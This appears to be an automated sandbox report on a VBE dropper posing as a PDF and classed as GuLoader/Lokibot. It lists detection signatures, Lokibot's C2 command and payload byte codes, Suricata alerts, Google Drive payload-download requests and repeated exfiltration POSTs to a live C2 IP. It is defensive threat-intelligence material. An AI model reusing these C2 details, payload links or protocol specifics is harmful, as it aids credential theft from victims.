Windows Analysis Report
PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe

Overview

General Information

Sample name: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
renamed because original name is a hash value
Original sample name: PRORAUNSKA ZAHTEVA 09-30-2024pdf.vbe
Analysis ID: 1523160
MD5: ae06697b71084618bb9a2d051f6fad2f
SHA1: d3cc11739d47aebc183e425750d53ea0d412c8e0
SHA256: dc6607f4aa63d04407994442f3f085ccd29a2feadac2a791b90cdbcfee2f5fac
Tags: Lokivbeuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
 https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: http://137.184.191.215/index.php/check.php?id=1 Virustotal: Detection: 14% Perma Link
Multi AV Scanner detection for submitted file
Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe ReversingLabs: Detection: 15%
Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe Virustotal: Detection: 12% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dxdiag.pdbGCTL source: 31437F.exe.18.dr
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dxdiag.pdb source: 31437F.exe.18.dr
Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: on.pdb source: powershell.exe, 00000004.00000002.3032733282.0000000007606000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49744 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49744 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49744 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49731 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49728 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49715 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49737 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49716 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49722 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49722 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49722 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49730 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49730 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49729 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49730 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 137.184.191.215:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 137.184.191.215:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 137.184.191.215 137.184.191.215
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PANDGUS PANDGUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49713 -> 142.250.184.238:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 180Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 180Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
